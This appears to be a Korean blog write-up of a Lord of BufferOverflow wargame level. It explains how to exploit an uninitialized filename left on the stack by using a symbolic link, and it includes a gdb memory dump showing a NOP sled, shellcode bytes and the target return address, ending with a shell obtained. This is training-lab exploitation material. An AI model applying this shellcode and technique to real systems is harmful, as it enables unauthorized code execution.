hint : 메모리를 살펴보면 초기화 되지 않은 값이 있다.
leave에 BP를 걸고 실행 후 esp를 확인하면 0으로 초기화되지 않은 파일제목이 남아있다. 이를 이용해서 이 문제를 푼다.
이전처럼 심볼릭링크를 이용해 문제를 풀면 된다.
아래가 nop sled 탈 수 있는 주소
(gdb) x/100x $esp 0xbffff9a8: 0x00000002 0x00000002 0x00000000 0x00000000 0xbffff9b8: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff9c8: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff9d8: 0x90909090 0xbfbfbfbf 0x00000000 0xbffffa24 0xbffff9e8: 0xbffffa30 0x40013868 0x00000002 0x08048450 0xbffff9f8: 0x00000000 0x08048471 0x08048500 0x00000002 0xbffffa08: 0xbffffa24 0x08048390 0x080486ac 0x4000ae60 0xbffffa18: 0xbffffa1c 0x40013e90 0x00000002 0xbffffb1c 0xbffffa28: 0xbffffbad 0x00000000 0xbffffbde 0xbffffbf0 0xbffffa38: 0xbffffc09 0xbffffc28 0xbffffc4a 0xbffffc57 0xbffffa48: 0xbffffe1a 0xbffffe39 0xbffffe56 0xbffffe6b 0xbffffa58: 0xbffffe8a 0xbffffe93 0xbffffe9e 0xbffffeae 0xbffffa68: 0xbffffeb6 0xbffffec2 0xbffffed3 0xbffffedd 0xbffffa78: 0xbffffeeb 0xbffffefc 0xbfffff0a 0xbfffff15 0xbffffa88: 0xbfffff28 0x00000000 0x00000003 0x08048034 0xbffffa98: 0x00000004 0x00000020 0x00000005 0x00000006 0xbffffaa8: 0x00000006 0x00001000 0x00000007 0x40000000 0xbffffab8: 0x00000008 0x00000000 0x00000009 0x08048450 0xbffffac8: 0x0000000b 0x000001fd 0x0000000c 0x000001fd 0xbffffad8: 0x0000000d 0x000001fd 0x0000000e 0x000001fd 0xbffffae8: 0x00000010 0x0fabfbff 0x0000000f 0xbffffb17 0xbffffaf8: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffb08: 0x00000000 0x00000000 0x00000000 0x69000000 0xbffffb18: 0x00363836 0x00000000 0x00000000 0x00000000 0xbffffb28: 0x00000000 0x00000000 0x00000000 0x00000000 (gdb) ...생략... 0xbffffe58: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe68: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe78: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe88: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffe98: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffea8: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffeb8: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffec8: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffed8: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffee8: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffef8: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffff08: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffff18: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffff28: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffff38: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffff48: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffff58: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffff68: 0x2f000000 0x656d6f68 0x6d61762f 0x65726970 0xbfffff78: 0x9090902f 0x90909090 0x90909090 0x90909090 0xbfffff88: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffff98: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffffa8: 0x90909090 0x90909090 0x90909090 0xd9c5d990 0xbfffffb8: 0xb8f42474 0xd769c315 0xb1c9295d 0x1a45310b 0xbfffffc8: 0x831a4503 0xe0e204c5 0x938f62a9 0x8e47137c 0xbfffffd8: 0xb87052e3 0x381717cc 0x5185f77b 0xf3a98e15
쉘을 땄다.
'Wargame > lord of bufferoverflow' 카테고리의 다른 글
| Lord of bufferoverflow golem (0) | 2017.08.21 |
|---|---|
| Lord of bufferoverflow skeleton (0) | 2017.08.21 |
| Lord of bufferoverflow troll (0) | 2017.08.18 |
| Lord of bufferoverflow orge (0) | 2017.08.18 |
| Lord of bufferoverflow darkelf (0) | 2017.08.17 |